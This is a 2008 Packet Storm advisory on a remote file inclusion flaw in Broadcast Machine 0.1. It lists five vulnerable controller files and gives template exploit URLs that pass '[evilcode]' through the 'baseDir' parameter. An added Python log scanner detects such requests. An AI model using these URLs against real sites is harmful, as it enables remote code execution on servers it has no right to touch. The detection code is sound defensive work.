broadcast-rfi.txt

2008-12-01T00:00:00
ID PACKETSTORM:72457
Type packetstorm
Reporter NoGe
Modified 2008-12-01T00:00:00

Description

=================================================================================================================  
  
  
[o] Broadcast Machine 0.1 Multiple Remote File Inclusion Vulnerability  
  
Software : Broadcast Machine version 0.1  
Vendor : http://code.google.com/p/broadcastmachine/  
View Source : https://svn.participatoryculture.org/svn/dtv/trunk/bmachine2/  
Author : NoGe  
Contact : noge[dot]code[at]gmail[dot]com  
Blog : http://evilc0de.blogspot.com  
  
  
=================================================================================================================  
  
  
[o] Vulnerable files  
  
All files below are affected by the "baseDir" parameter  
  
controllers/MySQLController.php  
  
controllers/SQLController.php  
  
controllers/SetupController.php  
  
controllers/VideoController.php  
  
controllers/ViewController.php  
  
  
  
[o] Exploit  
  
  
http://localhost/[path]/controllers/MySQLController.php?baseDir=[evilcode]  
  
http://localhost/[path]/controllers/SQLController.php?baseDir=[evilcode]  
  
http://localhost/[path]/controllers/SetupController.php?baseDir=[evilcode]  
  
http://localhost/[path]/controllers/VideoController.php?baseDir=[evilcode]  
  
http://localhost/[path]/controllers/ViewController.php?baseDir=[evilcode]  
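  
A log check for the requests listed above, as an added example that is not part of the original advisory: it flags access-log entries that reach one of the five listed controllers with a baseDir query parameter. The combined log format, the /bm/ install path and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Controller scripts the advisory lists as affected by "baseDir".
AFFECTED = {
    "MySQLController.php", "SQLController.php", "SetupController.php",
    "VideoController.php", "ViewController.php",
}

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; addresses, paths and hosts are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Dec/2008:10:00:00 +0000] "GET /bm/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Dec/2008:10:00:05 +0000] "GET /bm/controllers/ViewController.php'
    '?baseDir=http%3A%2F%2Fexample.invalid%2F HTTP/1.1" 200 310',
    '192.0.2.44 - - [01/Dec/2008:10:00:09 +0000] "GET /bm/controllers/SetupController.php'
    '?baseDir=/var/www/bm/ HTTP/1.1" 200 298',
    '192.0.2.10 - - [01/Dec/2008:10:00:12 +0000] "GET /bm/controllers/VideoController.php'
    '?id=7 HTTP/1.1" 200 2048',
]

def classify(log_line):
    """Return None, "basedir-param" or "basedir-remote" for one log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    parts = url.path.split("/")
    if len(parts) < 2 or parts[-2] != "controllers" or parts[-1] not in AFFECTED:
        return None
    # parse_qs percent-decodes the values, so encoded separators are seen too.
    values = parse_qs(url.query, keep_blank_values=True).get("baseDir", [])
    if not values:
        return None
    # A scheme separator or protocol-relative prefix points the base off-host.
    if any("://" in v or v.startswith("//") for v in values):
        return "basedir-remote"
    # Assumption: clients never need to supply baseDir, so any use is reported.
    return "basedir-param"

def scan(lines):
    """Return (1-based line number, verdict) for every flagged entry."""
    hits = ((n, classify(line)) for n, line in enumerate(lines, start=1))
    return [(n, verdict) for n, verdict in hits if verdict]
```

scan(SAMPLE_LOG) reports the second and third sample entries; the same paths and parameter name can be carried into a WAF or reverse-proxy rule that rejects baseDir on these scripts.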
  
  
=================================================================================================================  
  
  
[o] Greetz  
  
MainHack BrotherHood [ http://serverisdown.org/blog/]  
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa  
H312Y yooogy mousekill }^-^{ kaka11 martfella  
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke  
  
GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]  
  
  
=================================================================================================================  
  
  